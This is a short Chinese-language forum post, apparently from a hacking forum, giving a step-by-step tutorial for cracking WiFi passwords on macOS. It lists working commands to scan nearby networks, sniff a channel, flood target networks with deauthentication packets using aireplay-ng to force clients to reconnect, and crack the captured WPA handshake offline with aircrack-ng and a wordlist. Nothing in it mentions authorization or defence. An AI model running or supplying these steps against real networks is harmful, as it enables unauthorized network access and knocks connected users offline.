taibeihacker
Moderator
WIFI 密码破解
1 原理
通過發送斷開連接的請求,使得所有連接了目標WIFI 的設備全都斷開連接,設備會重新連接,然後監聽其中一個設備與WIFI 建立連接時的握手包,其中包含了密碼的密文,然後使用aircrack-ng 進行離線破解。2 步骤
2.1 扫描附近 SSID
12
3
4
執行命令獲取附近SSID
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s
設置快捷鍵後變成:
airport -s
2.2 抓握手包
資訊mac 下需要先安裝aircrack-ng
brew install aircrack-ng
1
airport en0 sniff 信道
等待一段時間後,CTRL+C 結束監聽
檢測這個包裡是否抓到裡握手包(是否包含密碼信息):
1
sudo aircrack-ng /tmp/airportSniffTRT4xj.cap
注:因為同一個信道可能並不止一個WIFI 信號在使用,所以會探測多個WIFI
2.3 DeAuth 泛洪攻击
12
sudo aireplay-ng -0 0 -a WIFI物理地址-c 用戶設備物理地址wlan0mon
參數-0 3 表示發送3次,-0 0 表示持續發送。 不加-c 參數表示斷開所有客戶端的連接
2.4 破解握手密码包
1sudo aircrack-ng /tmp/airportSniffTRT4xj.cap -w 字典路徑